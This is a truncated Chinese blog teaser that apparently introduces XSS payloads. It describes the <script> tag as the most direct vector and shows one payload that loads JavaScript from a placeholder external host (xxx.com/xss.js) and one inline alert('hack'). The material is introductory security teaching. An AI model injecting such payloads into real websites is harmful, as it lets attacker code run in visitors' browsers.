御用闲人

摘要： <script>标签： <script>标签是最直接的XSS有效载荷，脚本标记可以引用外部的JavaScript代码，也可以将代码插入脚本标记中 <script src=http://xxx.com/xss.js></script> #引用外部的xss <script> alert("hack")< 阅读全文